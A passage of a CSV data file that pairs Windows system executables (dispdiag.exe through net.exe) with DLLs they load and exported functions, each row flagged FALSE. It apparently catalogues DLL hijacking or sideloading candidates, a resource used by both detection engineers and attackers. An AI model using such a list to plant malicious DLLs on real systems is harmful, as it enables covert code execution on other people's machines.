 237 | FALSE,"dispdiag.exe","DXVA2.dll","GetNumberOfPhysicalMonitorsFromHMONITOR"
 238 | FALSE,"dispdiag.exe","WMICLNT.dll","DllMain"
 239 | FALSE,"dispdiag.exe","WMICLNT.dll","WmiDevInstToInstanceNameW"
 240 | FALSE,"dispdiag.exe","WMICLNT.dll","WmiOpenBlock"
 241 | FALSE,"displayswitch.exe","dwmapi.dll","DllMain"
 242 | FALSE,"displayswitch.exe","policymanager.dll","DllMain"
 243 | FALSE,"displayswitch.exe","policymanager.dll","PolicyManager_GetPolicyInt"
 244 | FALSE,"displayswitch.exe","UxTheme.dll","DllMain"
 245 | FALSE,"displayswitch.exe","WINSTA.dll","DllMain"
 246 | FALSE,"djoin.exe","dbgcore.DLL","DllMain"
 247 | FALSE,"djoin.exe","JOINUTIL.DLL","DllMain"
 248 | FALSE,"djoin.exe","logoncli.dll","DllMain"
 249 | FALSE,"djoin.exe","netutils.dll","DllMain"
 250 | FALSE,"djoin.exe","netutils.dll","NetApiBufferFree"
 251 | FALSE,"djoin.exe","wdscore.dll","ConstructPartialMsgVW"
 252 | FALSE,"djoin.exe","wdscore.dll","CurrentIP"
 253 | FALSE,"djoin.exe","wdscore.dll","DllMain"
 254 | FALSE,"djoin.exe","wdscore.dll","WdsSetupLogDestroy"
 255 | FALSE,"djoin.exe","wdscore.dll","WdsSetupLogInit"
 256 | FALSE,"djoin.exe","wdscore.dll","WdsSetupLogMessageW"
 257 | FALSE,"djoin.exe","wkscli.dll","DllMain"
 258 | FALSE,"dmcertinst.exe","certenroll.dll","DllMain"
 259 | FALSE,"dmcertinst.exe","DMCmnUtils.dll","DllMain"
 260 | FALSE,"dmcertinst.exe","DSPARSE.dll","DllMain"
 261 | FALSE,"dmcertinst.exe","iri.dll","DllMain"
 262 | FALSE,"dmcertinst.exe","omadmapi.dll","DllMain"
 263 | FALSE,"dmcertinst.exe","omadmapi.dll","ProcessCommandLine"
 264 | FALSE,"dmcfghost.exe","DMCmnUtils.dll","DllMain"
 265 | FALSE,"dmcfghost.exe","DMPushProxy.dll","DllMain"
 266 | FALSE,"dmcfghost.exe","DMPushProxy.dll","PushRouter_FreeGetMessageEventName"
 267 | FALSE,"dmcfghost.exe","DMPushProxy.dll","PushRouter_Open"
 268 | FALSE,"dmcfghost.exe","dmxmlhelputils.dll","DllMain"
 269 | FALSE,"dmcfghost.exe","dsclient.dll","DllMain"
 270 | FALSE,"dmcfghost.exe","iri.dll","DllMain"
 271 | FALSE,"dmcfghost.exe","omadmapi.dll","DllMain"
 272 | FALSE,"dmcfghost.exe","XmlLite.dll","DllMain"
 273 | FALSE,"dmclient.exe","WINHTTP.dll","DllMain"
 274 | FALSE,"dmclient.exe","XmlLite.dll","DllMain"
 275 | FALSE,"dmnotificationbroker.exe","DMCmnUtils.dll","DllMain"
 276 | FALSE,"dmomacpmo.exe","DEVOBJ.dll","DllMain"
 277 | FALSE,"dmomacpmo.exe","DMCmnUtils.dll","DllMain"
 278 | FALSE,"dmomacpmo.exe","dmEnrollEngine.DLL","DllMain"
 279 | FALSE,"dmomacpmo.exe","DMProcessXMLFiltered.dll","DllMain"
 280 | FALSE,"dmomacpmo.exe","dsclient.dll","DllMain"
 281 | FALSE,"dmomacpmo.exe","iri.dll","DllMain"
 282 | FALSE,"dmomacpmo.exe","omadmapi.dll","DllMain"
 283 | FALSE,"dmomacpmo.exe","omadmapi.dll","ProcessCommandLine"
 284 | FALSE,"dmomacpmo.exe","USERENV.dll","DllMain"
 285 | FALSE,"dmomacpmo.exe","XmlLite.dll","DllMain"
 286 | FALSE,"dnscacheugc.exe","dbgcore.DLL","DllMain"
 287 | FALSE,"dnscacheugc.exe","IPHLPAPI.DLL","DllMain"
 288 | FALSE,"dnscacheugc.exe","wdscore.dll","ConstructPartialMsgVW"
 289 | FALSE,"dnscacheugc.exe","wdscore.dll","CurrentIP"
 290 | FALSE,"dnscacheugc.exe","wdscore.dll","DllMain"
 291 | FALSE,"dnscacheugc.exe","wdscore.dll","WdsSetupLogDestroy"
 292 | FALSE,"dnscacheugc.exe","wdscore.dll","WdsSetupLogInit"
 293 | FALSE,"dnscacheugc.exe","wdscore.dll","WdsSetupLogMessageW"
 294 | FALSE,"dpapimig.exe","netutils.dll","DllMain"
 295 | FALSE,"dpapimig.exe","netutils.dll","NetApiBufferFree"
 296 | FALSE,"dpapimig.exe","samcli.dll","DllMain"
 297 | FALSE,"dpapimig.exe","samcli.dll","NetUserModalsGet"
 298 | FALSE,"dpapimig.exe","SAMLIB.dll","DllMain"
 299 | FALSE,"dpapimig.exe","SAMLIB.dll","SamConnect"
 300 | FALSE,"dpapimig.exe","SAMLIB.dll","SamEnumerateDomainsInSamServer"
 301 | FALSE,"dpapimig.exe","SAMLIB.dll","SamFreeMemory"
 302 | FALSE,"dpiscaling.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
 303 | FALSE,"dpiscaling.exe","CLDAPI.dll","DllMain"
 304 | FALSE,"dpiscaling.exe","CRYPTBASE.DLL","DllMain"
 305 | FALSE,"dpiscaling.exe","edputil.dll","DllMain"
 306 | FALSE,"dpiscaling.exe","edputil.dll","EdpGetIsManaged"
 307 | FALSE,"dpiscaling.exe","FLTLIB.DLL","DllMain"
 308 | FALSE,"dpiscaling.exe","PROPSYS.dll","DllMain"
 309 | FALSE,"dpiscaling.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
 310 | FALSE,"dpiscaling.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
 311 | FALSE,"driverquery.exe","netutils.dll","DllMain"
 312 | FALSE,"driverquery.exe","srvcli.dll","DllMain"
 313 | FALSE,"driverquery.exe","SspiCli.dll","DllMain"
 314 | FALSE,"drvinst.exe","DEVOBJ.dll","DllMain"
 315 | FALSE,"drvinst.exe","DEVRTL.dll","DllMain"
 316 | FALSE,"dsregcmd.exe","dsreg.dll","DllMain"
 317 | FALSE,"dsregcmd.exe","logoncli.dll","DllMain"
 318 | FALSE,"dsregcmd.exe","netutils.dll","DllMain"
 319 | FALSE,"dsregcmd.exe","PROPSYS.dll","DllMain"
 320 | FALSE,"dsregcmd.exe","SSPICLI.DLL","DllMain"
 321 | FALSE,"dsregcmd.exe","USERENV.dll","DllMain"
 322 | FALSE,"dsregcmd.exe","WINHTTP.dll","DllMain"
 323 | FALSE,"dsregcmd.exe","WININET.dll","DllMain"
 324 | FALSE,"dsregcmd.exe","wkscli.dll","DllMain"
 325 | FALSE,"dstokenclean.exe","dsclient.dll","DllMain"
 326 | FALSE,"dstokenclean.exe","dsclient.dll","DSRemoveExpiredTokens"
 327 | FALSE,"dwm.exe","CoreMessaging.dll","DllMain"
 328 | FALSE,"dwm.exe","d2d1.dll","DllMain"
 329 | FALSE,"dwm.exe","d3d11.dll","DllMain"
 330 | FALSE,"dwm.exe","D3DCOMPILER_47.dll","DllMain"
 331 | FALSE,"dwm.exe","dwmcore.dll","DllMain"
 332 | FALSE,"dwm.exe","dxgi.dll","DllMain"
 333 | FALSE,"dwm.exe","dxgi.dll","DXGIDeclareAdapterRemovalSupport"
 334 | FALSE,"dwwin.exe","wer.dll","DllMain"
 335 | FALSE,"dxgiadaptercache.exe","d3d11.dll","DllMain"
 336 | FALSE,"dxgiadaptercache.exe","d3d12.dll","DllMain"
 337 | FALSE,"dxgiadaptercache.exe","dxgi.dll","DllMain"
 338 | FALSE,"dxpserver.exe","dwmapi.dll","DllMain"
 339 | FALSE,"dxpserver.exe","msi.dll","DllMain"
 340 | FALSE,"dxpserver.exe","PROPSYS.dll","DllMain"
 341 | FALSE,"dxpserver.exe","XmlLite.dll","DllMain"
 342 | FALSE,"easeofaccessdialog.exe","OLEACC.dll","DllMain"
 343 | FALSE,"edpcleanup.exe","DMCmnUtils.dll","DllMain"
 344 | FALSE,"edpcleanup.exe","DNSAPI.dll","DllMain"
 345 | FALSE,"edpcleanup.exe","FirewallAPI.dll","DllMain"
 346 | FALSE,"edpcleanup.exe","fwbase.dll","DllMain"
 347 | FALSE,"edpcleanup.exe","fwbase.dll","FwCriticalSectionCreate"
 348 | FALSE,"edpcleanup.exe","fwbase.dll","FwCriticalSectionDestroy"
 349 | FALSE,"edpcleanup.exe","netutils.dll","DllMain"
 350 | FALSE,"edpcleanup.exe","policymanager.dll","DllMain"
 351 | FALSE,"edpcleanup.exe","SspiCli.dll","DllMain"
 352 | FALSE,"edpcleanup.exe","wkscli.dll","DllMain"
 353 | FALSE,"eduprintprov.exe","deviceassociation.dll","DllMain"
 354 | FALSE,"eduprintprov.exe","policymanager.dll","DllMain"
 355 | FALSE,"eduprintprov.exe","policymanager.dll","PolicyManager_GetPolicy"
 356 | FALSE,"eduprintprov.exe","SspiCli.dll","DllMain"
 357 | FALSE,"eduprintprov.exe","SspiCli.dll","GetUserNameExW"
 358 | FALSE,"efsui.exe","credui.dll","DllMain"
 359 | FALSE,"efsui.exe","CRYPTBASE.DLL","DllMain"
 360 | FALSE,"efsui.exe","CRYPTUI.dll","DllMain"
 361 | FALSE,"efsui.exe","DSROLE.dll","DllMain"
 362 | FALSE,"efsui.exe","EFSADU.dll","DllMain"
 363 | FALSE,"efsui.exe","EFSUTIL.dll","DllMain"
 364 | FALSE,"efsui.exe","FeClient.dll","DllMain"
 365 | FALSE,"efsui.exe","logoncli.dll","DllMain"
 366 | FALSE,"efsui.exe","netutils.dll","DllMain"
 367 | FALSE,"efsui.exe","USERENV.dll","DllMain"
 368 | FALSE,"efsui.exe","VAULTCLI.dll","DllMain"
 369 | FALSE,"ehstorauthn.exe","UxTheme.dll","DllMain"
 370 | FALSE,"esentutl.exe","ESENT.dll","DllMain"
 371 | FALSE,"eventcreate.exe","netutils.dll","DllMain"
 372 | FALSE,"eventcreate.exe","srvcli.dll","DllMain"
 373 | FALSE,"eventcreate.exe","SspiCli.dll","DllMain"
 374 | FALSE,"expand.exe","Cabinet.dll","DllMain"
 375 | FALSE,"extrac32.exe","Cabinet.dll","DllMain"
 376 | FALSE,"fhmanagew.exe","fhsvcctl.dll","DllMain"
 377 | FALSE,"filehistory.exe","CRYPTBASE.dll","DllMain"
 378 | FALSE,"filehistory.exe","CRYPTBASE.dll","SystemFunction036"
 379 | FALSE,"filehistory.exe","UxTheme.dll","DllMain"
 380 | FALSE,"filehistory.exe","UxTheme.dll","EnableThemeDialogTexture"
 381 | FALSE,"filehistory.exe","UxTheme.dll","OpenThemeData"
 382 | FALSE,"fixmapi.exe","mapistub.dll","DllMain"
 383 | FALSE,"fixmapi.exe","mapistub.dll","FixMAPI"
 384 | FALSE,"fltmc.exe","FLTLIB.DLL","DllMain"
 385 | FALSE,"fltmc.exe","FLTLIB.DLL","FilterFindFirst"
 386 | FALSE,"fltmc.exe","FLTLIB.DLL","FilterFindNext"
 387 | FALSE,"fondue.exe","msi.dll","DllMain"
 388 | FALSE,"fondue.exe","osbaseln.dll","DllMain"
 389 | FALSE,"fondue.exe","PROPSYS.dll","DllMain"
 390 | FALSE,"fsiso.exe","iumbase.DLL","DllMain"
 391 | FALSE,"fsquirt.exe","DEVOBJ.dll","DevObjCreateDeviceInfoList"
 392 | FALSE,"fsquirt.exe","DEVOBJ.dll","DevObjDestroyDeviceInfoList"
 393 | FALSE,"fsquirt.exe","DEVOBJ.dll","DevObjGetClassDevs"
 394 | FALSE,"fsquirt.exe","DEVOBJ.dll","DllMain"
 395 | FALSE,"fsquirt.exe","dwmapi.dll","DllMain"
 396 | FALSE,"fsquirt.exe","dwmapi.dll","DwmExtendFrameIntoClientArea"
 397 | FALSE,"fsquirt.exe","OLEACC.dll","DllMain"
 398 | FALSE,"fsquirt.exe","OLEACC.dll","GetRoleTextW"
 399 | FALSE,"ftp.exe","SspiCli.dll","DllMain"
 400 | FALSE,"fvenotify.exe","FVEAPI.dll","DllMain"
 401 | FALSE,"fvenotify.exe","FVEAPI.dll","FveFindFirstVolume"
 402 | FALSE,"fvenotify.exe","FVEAPI.dll","FveFindNextVolume"
 403 | FALSE,"fvenotify.exe","FVEAPI.dll","FveGetStatus"
 404 | FALSE,"fvenotify.exe","FVEAPI.dll","FveGetVolumeNameW"
 405 | FALSE,"fvenotify.exe","FVEAPI.dll","FveIsVolumeEncryptable"
 406 | FALSE,"fvenotify.exe","FVEAPI.dll","FveOpenVolumeByHandle"
 407 | FALSE,"fvenotify.exe","FVEAPI.dll","FveOpenVolumeW"
 408 | FALSE,"fveprompt.exe","FVEAPI.dll","DllMain"
 409 | FALSE,"fxscover.exe","IPHLPAPI.DLL","DllMain"
 410 | FALSE,"fxscover.exe","IPHLPAPI.DLL","GetAdaptersAddresses"
 411 | FALSE,"fxssvc.exe","credui.dll","DllMain"
 412 | FALSE,"fxssvc.exe","FXSTIFF.dll","DllMain"
 413 | FALSE,"fxssvc.exe","IPHLPAPI.DLL","DllMain"
 414 | FALSE,"fxssvc.exe","PROPSYS.dll","DllMain"
 415 | FALSE,"fxssvc.exe","TAPI32.dll","DllMain"
 416 | FALSE,"gamepanel.exe","d2d1.dll","DllMain"
 417 | FALSE,"gamepanel.exe","d3d11.dll","DllMain"
 418 | FALSE,"gamepanel.exe","dcomp.dll","DllMain"
 419 | FALSE,"gamepanel.exe","dwmapi.dll","DllMain"
 420 | FALSE,"gamepanel.exe","dwmapi.dll","DwmSetWindowAttribute"
 421 | FALSE,"gamepanel.exe","DWrite.dll","DllMain"
 422 | FALSE,"gamepanel.exe","DWrite.dll","DWriteCreateFactory"
 423 | FALSE,"gamepanel.exe","dxgi.dll","CreateDXGIFactory2"
 424 | FALSE,"gamepanel.exe","dxgi.dll","DllMain"
 425 | FALSE,"gamepanel.exe","msdrm.dll","DllMain"
 426 | FALSE,"gamepanel.exe","UIAutomationCore.DLL","DllMain"
 427 | FALSE,"gamepanel.exe","UxTheme.dll","DllMain"
 428 | FALSE,"gamepanel.exe","UxTheme.dll","EnableThemeDialogTexture"
 429 | FALSE,"gamepanel.exe","UxTheme.dll","OpenThemeData"
 430 | FALSE,"genvalobj.exe","bcd.dll","DllMain"
 431 | FALSE,"getmac.exe","netutils.dll","DllMain"
 432 | FALSE,"getmac.exe","srvcli.dll","DllMain"
 433 | FALSE,"getmac.exe","SspiCli.dll","DllMain"
 434 | FALSE,"getmac.exe","wkscli.dll","DllMain"
 435 | FALSE,"gpresult.exe","logoncli.dll","DllMain"
 436 | FALSE,"gpresult.exe","netutils.dll","DllMain"
 437 | FALSE,"gpresult.exe","NTDSAPI.dll","DllMain"
 438 | FALSE,"gpresult.exe","Secur32.dll","DllMain"
 439 | FALSE,"gpresult.exe","srvcli.dll","DllMain"
 440 | FALSE,"gpresult.exe","SspiCli.dll","DllMain"
 441 | FALSE,"gpupdate.exe","USERENV.dll","DllMain"
 442 | FALSE,"gpupdate.exe","wevtapi.dll","DllMain"
 443 | FALSE,"hvax64.exe","KDSTUB.dll","DllMain"
 444 | FALSE,"hvix64.exe","KDSTUB.dll","DllMain"
 445 | FALSE,"hvsievaluator.exe","DismApi.DLL","DllMain"
 446 | FALSE,"hvsievaluator.exe","DMCmnUtils.dll","DllMain"
 447 | FALSE,"hvsievaluator.exe","iri.dll","DllMain"
 448 | FALSE,"hvsievaluator.exe","omadmapi.dll","DllMain"
 449 | FALSE,"hvsievaluator.exe","policymanager.dll","DllMain"
 450 | FALSE,"hvsievaluator.exe","policymanager.dll","PolicyManager_GetPolicyInt"
 451 | FALSE,"ie4uinit.exe","CRYPTBASE.DLL","DllMain"
 452 | FALSE,"ie4uinit.exe","IEADVPACK.dll","DllMain"
 453 | FALSE,"ie4uinit.exe","iedkcs32.dll","DllMain"
 454 | FALSE,"ie4uinit.exe","MLANG.dll","DllMain"
 455 | FALSE,"ie4uinit.exe","netutils.dll","DllMain"
 456 | FALSE,"ie4uinit.exe","WININET.dll","DllMain"
 457 | FALSE,"ie4uinit.exe","wkscli.dll","DllMain"
 458 | FALSE,"ieunatt.exe","dbgcore.DLL","DllMain"
 459 | FALSE,"klist.exe","secur32.dll","DllMain"
 460 | FALSE,"ksetup.exe","logoncli.dll","DllMain"
 461 | FALSE,"ksetup.exe","netutils.dll","DllMain"
 462 | FALSE,"ksetup.exe","srvcli.dll","DllMain"
 463 | FALSE,"ksetup.exe","SspiCli.dll","DllMain"
 464 | FALSE,"label.exe","DEVOBJ.dll","DllMain"
 465 | FALSE,"licensingdiag.exe","Cabinet.dll","DllMain"
 466 | FALSE,"licensingdiag.exe","Cabinet.dll","FCICreate"
 467 | FALSE,"licensingdiag.exe","CLIPC.dll","ClipGatherDiagnostics"
 468 | FALSE,"licensingdiag.exe","CLIPC.dll","ClipGenerateDeviceLicenseRequest"
 469 | FALSE,"licensingdiag.exe","CLIPC.dll","ClipGetLicenseAndPolicyForPfn"
 470 | FALSE,"licensingdiag.exe","CLIPC.dll","ClipOpen"
 471 | FALSE,"licensingdiag.exe","CLIPC.dll","DllMain"
 472 | FALSE,"lockscreencontentserver.exe","dwmapi.dll","DllMain"
 473 | FALSE,"lpksetup.exe","CRYPTBASE.dll","DllMain"
 474 | FALSE,"lpksetup.exe","CRYPTBASE.dll","SystemFunction036"
 475 | FALSE,"lpksetup.exe","dpx.dll","DllMain"
 476 | FALSE,"lpremove.exe","AppXAllUserStore.dll","DllMain"
 477 | FALSE,"lpremove.exe","AppXAllUserStore.dll","IsNonInboxAllUserPackage"
 478 | FALSE,"lpremove.exe","AppXDeploymentClient.dll","DllMain"
 479 | FALSE,"lpremove.exe","Bcp47Langs.dll","Bcp47GetMuiForm"
 480 | FALSE,"lpremove.exe","Bcp47Langs.dll","DllMain"
 481 | FALSE,"lpremove.exe","Bcp47Langs.dll","GetUserLanguagesForUser"
 482 | FALSE,"lpremove.exe","DNSAPI.dll","DllMain"
 483 | FALSE,"lpremove.exe","FirewallAPI.dll","DllMain"
 484 | FALSE,"lpremove.exe","fwbase.dll","DllMain"
 485 | FALSE,"lpremove.exe","fwbase.dll","FwCriticalSectionCreate"
 486 | FALSE,"lpremove.exe","fwbase.dll","FwCriticalSectionDestroy"
 487 | FALSE,"lpremove.exe","StateRepository.Core.dll","DllMain"
 488 | FALSE,"magnify.exe","d3d9.dll","DllMain"
 489 | FALSE,"magnify.exe","MAGNIFICATION.dll","DllMain"
 490 | FALSE,"magnify.exe","MAGNIFICATION.dll","MagInitialize"
 491 | FALSE,"magnify.exe","MAGNIFICATION.dll","MagSetFullscreenTransform"
 492 | FALSE,"magnify.exe","MAGNIFICATION.dll","MagSetFullscreenUseBitmapSmoothing"
 493 | FALSE,"magnify.exe","MAGNIFICATION.dll","MagSetInputTransform"
 494 | FALSE,"magnify.exe","MAGNIFICATION.dll","MagShowSystemCursor"
 495 | FALSE,"magnify.exe","MAGNIFICATION.dll","MagUninitialize"
 496 | FALSE,"magnify.exe","OLEACC.dll","DllMain"
 497 | FALSE,"magnify.exe","UIAutomationCore.DLL","DllMain"
 498 | FALSE,"magnify.exe","WTSAPI32.dll","DllMain"
 499 | FALSE,"makecab.exe","Cabinet.dll","DllMain"
 500 | FALSE,"mcbuilder.exe","bcp47mrm.dll","DllMain"
 501 | FALSE,"mcbuilder.exe","bcp47mrm.dll","IsWellFormedTag"
 502 | FALSE,"mcbuilder.exe","mrmcoreR.dll","DllMain"
 503 | FALSE,"mcbuilder.exe","mrmcoreR.dll","MergeSystemPriFiles"
 504 | FALSE,"mdeserver.exe","d3d11.dll","DllMain"
 505 | FALSE,"mdeserver.exe","dxgi.dll","DllMain"
 506 | FALSE,"mdeserver.exe","MFPlat.DLL","DllMain"
 507 | FALSE,"mdeserver.exe","MFPlat.DLL","MFStartup"
 508 | FALSE,"mdeserver.exe","RTWorkQ.DLL","DllMain"
 509 | FALSE,"mdeserver.exe","RTWorkQ.DLL","RtwqRegisterPlatformEvents"
 510 | FALSE,"mdeserver.exe","RTWorkQ.DLL","RtwqStartup"
 511 | FALSE,"mdeserver.exe","SspiCli.dll","DllMain"
 512 | FALSE,"mdeserver.exe","winmde.dll","DllMain"
 513 | FALSE,"mdmappinstaller.exe","DEVOBJ.dll","DllMain"
 514 | FALSE,"mdmappinstaller.exe","DMCmnUtils.dll","DllMain"
 515 | FALSE,"mdmappinstaller.exe","dmEnrollEngine.DLL","DllMain"
 516 | FALSE,"mdmappinstaller.exe","iri.dll","DllMain"
 517 | FALSE,"mdmappinstaller.exe","msi.dll","DllMain"
 518 | FALSE,"mdmappinstaller.exe","omadmapi.dll","DllMain"
 519 | FALSE,"mdmappinstaller.exe","USERENV.dll","DllMain"
 520 | FALSE,"mdmappinstaller.exe","WTSAPI32.dll","DllMain"
 521 | FALSE,"mdmdiagnosticstool.exe","DEVOBJ.dll","DllMain"
 522 | FALSE,"mdmdiagnosticstool.exe","DMCmnUtils.dll","DllMain"
 523 | FALSE,"mdmdiagnosticstool.exe","dmEnrollEngine.DLL","DllMain"
 524 | FALSE,"mdmdiagnosticstool.exe","dmiso8601utils.dll","DllMain"
 525 | FALSE,"mdmdiagnosticstool.exe","DynamoAPI.dll","DllMain"
 526 | FALSE,"mdmdiagnosticstool.exe","iri.dll","DllMain"
 527 | FALSE,"mdmdiagnosticstool.exe","MdmDiagnostics.dll","DllMain"
 528 | FALSE,"mdmdiagnosticstool.exe","omadmapi.dll","DllMain"
 529 | FALSE,"mdmdiagnosticstool.exe","policymanager.dll","DllMain"
 530 | FALSE,"mdmdiagnosticstool.exe","tbs.dll","DllMain"
 531 | FALSE,"mdmdiagnosticstool.exe","USERENV.dll","DllMain"
 532 | FALSE,"mdmdiagnosticstool.exe","WINHTTP.dll","DllMain"
 533 | FALSE,"mdmdiagnosticstool.exe","WININET.dll","DllMain"
 534 | FALSE,"mdmdiagnosticstool.exe","XmlLite.dll","DllMain"
 535 | FALSE,"mfpmp.exe","CRYPTBASE.DLL","DllMain"
 536 | FALSE,"mfpmp.exe","ksuser.dll","DllMain"
 537 | FALSE,"mfpmp.exe","MFCORE.dll","DllMain"
 538 | FALSE,"mfpmp.exe","MFPlat.DLL","DllMain"
 539 | FALSE,"mfpmp.exe","MFPlat.DLL","MFGetCallStackTracingWeakReference"
 540 | FALSE,"mfpmp.exe","MFPlat.DLL","MFShutdown"
 541 | FALSE,"mfpmp.exe","RTWorkQ.DLL","DllMain"
 542 | FALSE,"mfpmp.exe","RTWorkQ.DLL","RtwqRegisterPlatformEvents"
 543 | FALSE,"mfpmp.exe","RTWorkQ.DLL","RtwqShutdown"
 544 | FALSE,"microsoft.uev.cscunpintool.exe","CSCAPI.dll","DllMain"
 545 | FALSE,"microsoft.uev.cscunpintool.exe","CSCAPI.dll","OfflineFilesQueryStatus"
 546 | FALSE,"microsoftedgebchost.exe","iertutil.dll","DllMain"
 547 | FALSE,"microsoftedgebchost.exe","USERENV.dll","DllMain"
 548 | FALSE,"microsoftedgecp.exe","iertutil.dll","DllMain"
 549 | FALSE,"microsoftedgecp.exe","USERENV.dll","DllMain"
 550 | FALSE,"microsoftedgedevtools.exe","iertutil.dll","DllMain"
 551 | FALSE,"microsoftedgesh.exe","USERENV.dll","DllMain"
 552 | FALSE,"microsoftedgesh.exe","USERENV.dll","GetAppContainerRegistryLocation"
 553 | FALSE,"mobsync.exe","edputil.dll","DllMain"
 554 | FALSE,"mobsync.exe","edputil.dll","EdpGetIsManaged"
 555 | FALSE,"mobsync.exe","PROPSYS.dll","DllMain"
 556 | FALSE,"mobsync.exe","PROPSYS.dll","PSGetNameFromPropertyKey"
 557 | FALSE,"mobsync.exe","PROPSYS.dll","PSStringFromPropertyKey"
 558 | FALSE,"mobsync.exe","PROPSYS.dll","VariantToString"
 559 | FALSE,"mousocoreworker.exe","winsqlite3.dll","DllMain"
 560 | FALSE,"msdt.exe","ATL.DLL","DllMain"
 561 | FALSE,"msdt.exe","Cabinet.dll","DllMain"
 562 | FALSE,"msdt.exe","SSPICLI.DLL","DllMain"
 563 | FALSE,"msdt.exe","SSPICLI.DLL","GetUserNameExW"
 564 | FALSE,"msdt.exe","UxTheme.dll","DllMain"
 565 | FALSE,"msdt.exe","wer.dll","DllMain"
 566 | FALSE,"msdt.exe","WINHTTP.dll","DllMain"
 567 | FALSE,"msdtc.exe","CLUSAPI.dll","DllMain"
 568 | FALSE,"msdtc.exe","DNSAPI.dll","DllMain"
 569 | FALSE,"msdtc.exe","ktmw32.dll","DllMain"
 570 | FALSE,"msdtc.exe","MSDTCTM.dll","DllMain"
 571 | FALSE,"msdtc.exe","MSDTCTM.dll","DtcMainExt"
 572 | FALSE,"msdtc.exe","MTXCLU.DLL","DllMain"
 573 | FALSE,"msdtc.exe","RESUTILS.dll","DllMain"
 574 | FALSE,"msdtc.exe","XOLEHLP.dll","DllMain"
 575 | FALSE,"msg.exe","WINSTA.dll","DllMain"
 576 | FALSE,"mshta.exe","CRYPTBASE.DLL","DllMain"
 577 | FALSE,"mshta.exe","netutils.dll","DllMain"
 578 | FALSE,"mshta.exe","srpapi.dll","DllMain"
 579 | FALSE,"mshta.exe","srpapi.dll","SrpGetEnterpriseIds"
 580 | FALSE,"mshta.exe","SspiCli.dll","DllMain"
 581 | FALSE,"mshta.exe","SspiCli.dll","GetUserNameExW"
 582 | FALSE,"mshta.exe","WINHTTP.dll","DllMain"
 583 | FALSE,"mshta.exe","wkscli.dll","DllMain"
 584 | FALSE,"mshta.exe","WLDP.DLL","DllMain"
 585 | FALSE,"mshta.exe","WLDP.DLL","WldpGetLockdownPolicy"
 586 | FALSE,"msiexec.exe","msi.dll","DllMain"
 587 | FALSE,"msiexec.exe","msi.dll","MsiLoadStringW"
 588 | FALSE,"msiexec.exe","msi.dll","MsiMessageBoxExW"
 589 | FALSE,"msinfo32.exe","ATL.DLL","DllMain"
 590 | FALSE,"msinfo32.exe","SLC.dll","DllMain"
 591 | FALSE,"msinfo32.exe","sppc.dll","DllMain"
 592 | FALSE,"mspaint.exe","MSFTEDIT.DLL","DllMain"
 593 | FALSE,"mspaint.exe","PROPSYS.dll","DllMain"
 594 | FALSE,"msra.exe","IPHLPAPI.DLL","DllMain"
 595 | FALSE,"msra.exe","IPHLPAPI.DLL","GetAdaptersAddresses"
 596 | FALSE,"msra.exe","IPHLPAPI.DLL","NotifyUnicastIpAddressChange"
 597 | FALSE,"msra.exe","NDFAPI.DLL","DllMain"
 598 | FALSE,"msra.exe","SspiCli.dll","DllMain"
 599 | FALSE,"msra.exe","SspiCli.dll","GetUserNameExA"
 600 | FALSE,"msra.exe","SspiCli.dll","GetUserNameExW"
 601 | FALSE,"msra.exe","USERENV.dll","DllMain"
 602 | FALSE,"msra.exe","USERENV.dll","GetProfileType"
 603 | FALSE,"msra.exe","UxTheme.dll","DllMain"
 604 | FALSE,"msra.exe","UxTheme.dll","IsAppThemed"
 605 | FALSE,"msra.exe","UxTheme.dll","IsThemeActive"
 606 | FALSE,"msra.exe","UxTheme.dll","OpenThemeData"
 607 | FALSE,"msra.exe","wdi.dll","DllMain"
 608 | FALSE,"mstsc.exe","credui.dll","DllMain"
 609 | FALSE,"mstsc.exe","CRYPTBASE.DLL","DllMain"
 610 | FALSE,"mstsc.exe","CRYPTUI.dll","DllMain"
 611 | FALSE,"mstsc.exe","IPHLPAPI.DLL","DllMain"
 612 | FALSE,"mstsc.exe","ktmw32.dll","DllMain"
 613 | FALSE,"mstsc.exe","NETUTILS.DLL","DllMain"
 614 | FALSE,"mstsc.exe","SSPICLI.DLL","DllMain"
 615 | FALSE,"mstsc.exe","WINHTTP.dll","DllMain"
 616 | FALSE,"mstsc.exe","WININET.dll","DllMain"
 617 | FALSE,"mstsc.exe","WKSCLI.DLL","DllMain"
 618 | FALSE,"mtstocom.exe","SspiCli.dll","DllMain"
 619 | FALSE,"muiunattend.exe","dbgcore.DLL","DllMain"
 620 | FALSE,"muiunattend.exe","SspiCli.dll","DllMain"
 621 | FALSE,"muiunattend.exe","wdscore.dll","ConstructPartialMsgVW"
 622 | FALSE,"muiunattend.exe","wdscore.dll","CurrentIP"
 623 | FALSE,"muiunattend.exe","wdscore.dll","DllMain"
 624 | FALSE,"muiunattend.exe","wdscore.dll","WdsSetupLogInit"
 625 | FALSE,"muiunattend.exe","wdscore.dll","WdsSetupLogMessageW"
 626 | FALSE,"musnotification.exe","Cabinet.dll","DllMain"
 627 | FALSE,"musnotification.exe","UpdatePolicy.dll","DllMain"
 628 | FALSE,"musnotification.exe","UPShared.dll","DllMain"
 629 | FALSE,"musnotification.exe","USERENV.dll","DllMain"
 630 | FALSE,"musnotification.exe","WINHTTP.dll","DllMain"
 631 | FALSE,"musnotification.exe","WINSTA.dll","DllMain"
 632 | FALSE,"musnotification.exe","WINSTA.dll","WinStationEnumerateW"
 633 | FALSE,"musnotificationux.exe","Cabinet.dll","DllMain"
 634 | FALSE,"musnotificationux.exe","DMCmnUtils.dll","DllMain"
 635 | FALSE,"musnotificationux.exe","UpdatePolicy.dll","DllMain"
 636 | FALSE,"musnotificationux.exe","UPShared.dll","DllMain"
 637 | FALSE,"musnotificationux.exe","WINHTTP.dll","DllMain"
 638 | FALSE,"musnotificationux.exe","XmlLite.dll","DllMain"
 639 | FALSE,"musnotifyicon.exe","DMCmnUtils.dll","DllMain"
 640 | FALSE,"musnotifyicon.exe","UPShared.dll","DllMain"
 641 | FALSE,"musnotifyicon.exe","WINHTTP.dll","DllMain"
 642 | FALSE,"musnotifyicon.exe","XmlLite.dll","DllMain"
 643 | FALSE,"nbtstat.exe","IPHLPAPI.DLL","DllMain"
 644 | FALSE,"net.exe","IPHLPAPI.DLL","DllMain"
 645 | FALSE,"net.exe","netutils.dll","DllMain"
 646 | FALSE,"net.exe","netutils.dll","NetApiBufferAllocate"
 647 | FALSE,"net.exe","samcli.dll","DllMain"
 648 | FALSE,"net.exe","srvcli.dll","DllMain"
 649 | FALSE,"net.exe","wkscli.dll","DllMain"
